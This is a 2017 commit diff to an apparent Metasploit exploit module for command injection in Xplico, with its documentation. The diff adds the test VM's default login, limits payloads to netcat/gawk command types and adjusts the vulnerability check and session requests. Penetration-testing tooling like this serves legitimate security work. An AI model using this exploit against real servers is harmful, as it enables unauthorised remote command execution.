Updatig documentation and tweaking initiate_session

mdisec · mdisec · commit 54936b6ac305 · 2017-11-15T01:04:06.000+03:00
diff --git a/documentation/modules/exploit/linux/http/xplico_exec.md b/documentation/modules/exploit/linux/http/xplico_exec.md
@@ -16,9 +16,11 @@ Follow instruction from "from sourceforge" section at following URL. Don't forge
 
 [http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu)
 
-You may also give a try to virtualbox image provided by maintainer of Xplico.
+You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova.
 [https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/)
 
+Username of the virtualbox image is "ubuntu" and password is "reverse".
+
 ## Verification Steps
 
 A successful check of the exploit will look like this:
diff --git a/modules/exploits/linux/http/xplico_exec.rb b/modules/exploits/linux/http/xplico_exec.rb
@@ -50,8 +50,7 @@ def initialize(info={})
           'Compat' =>
             {
               'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic netcat gawk', # rest of them can't fit within 252 space due to badchars.
-              'ConnectionType' => '-bind' # iptables block incoming connections to everything.
+              'RequiredCmd' => 'generic netcat gawk', # other cmd payloads can't fit within 252 space due to badchars.
             },
         },
       'Targets'         => [ ['Automatic', {}] ],
@@ -62,22 +61,24 @@ def initialize(info={})
   end
 
   def check
+    # There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection.
+    # which is not something we want to do for only check..!
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'users', 'register'),
     )
     if res && res.code == 302
       Exploit::CheckCode::Safe
     else
-      Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Unknown
     end
   end
 
   def initiate_session
     print_status('Initiating new session on server side')
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'uri' => normalize_uri(target_uri.path, 'users', 'login'),
     )
     if res && res.code == 200
       res.get_cookies
@@ -159,7 +160,7 @@ def register_user(username, password)
     if res && res.code == 200 && res.body.include?('Registration Completed.')
       print_good('User successfully activated')
     else
-      fail_with(Failure::Unknown, 'Could not activated our user.')
+      fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
     end
   end
 
